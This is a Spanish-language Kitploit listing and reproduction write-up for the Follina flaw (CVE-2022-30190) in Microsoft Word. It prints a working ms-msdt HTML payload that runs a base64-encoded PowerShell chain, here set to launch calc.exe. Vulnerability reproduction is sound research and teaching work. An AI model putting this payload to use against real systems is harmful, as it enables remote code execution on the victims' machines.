Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-30190 — Reproducción de la vulnerabilidad de ejecución remota de código CVE-2022-30190 (Follina) en Microsoft Office Word mediante archivos docx/rtf maliciosos con el controlador de protocolo ms-msdt. | Kitploit
Herramientas/GitHubGitHub/doocop/cve-2022-30190
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubdoocop/cve-2022-30190

CVE-2022-30190

Reproducción de la vulnerabilidad de ejecución remota de código CVE-2022-30190 (Follina) en Microsoft Office Word mediante archivos docx/rtf maliciosos con el controlador de protocolo ms-msdt.

Ver Repositorio
591411hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-30190

Reproducción de Microsoft Office Word Rce (CVE-2022-30190)

Resumen de la vulnerabilidad

Los archivos .docx de MS Office pueden contener referencias externas a objetos OLE como archivos HTML. Existe un escenario HTML que usa ms-msdt: para invocar la herramienta de diagnóstico msdt, la cual puede ejecutar código arbitrario (especificado en los parámetros).

El resultado es un vector de ataque terrible que permite obtener RCE con solo abrir un archivo .docx malicioso (sin usar macros).

Comenzar la reproducción

Descarga la muestra que @nao_sec compartió por primera vez en Twitter.

image-20220531145248604

Abre 02-2022-0438.doc con un programa de compresión.

image-20220531145416735

Abre el archivo /word/_rels/document.xml.rels como se muestra a continuación.

image-20220531145620951

Ok, en la parte subrayada de la imagen anterior se puede ver que contiene una referencia externa a hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html.

La dirección HTML maliciosa original ya no está disponible, así que hice un fork del archivo HTML malicioso indicado por @nao_sec. El archivo es el siguiente:

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//重复....

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNhbGMuZXhlIjtTdGFydC1Qcm9jZXNzICRjbWQ7'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

En cuanto a por qué se necesitan tantos datos basura al principio, es para que todo el archivo HTML alcance los 4096 bytes. Para un análisis detallado, consulta https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug

Dado que el POC anterior ejecuta PowerShell, lo reemplazamos por la calculadora. El código es el siguiente:

Descargar herramienta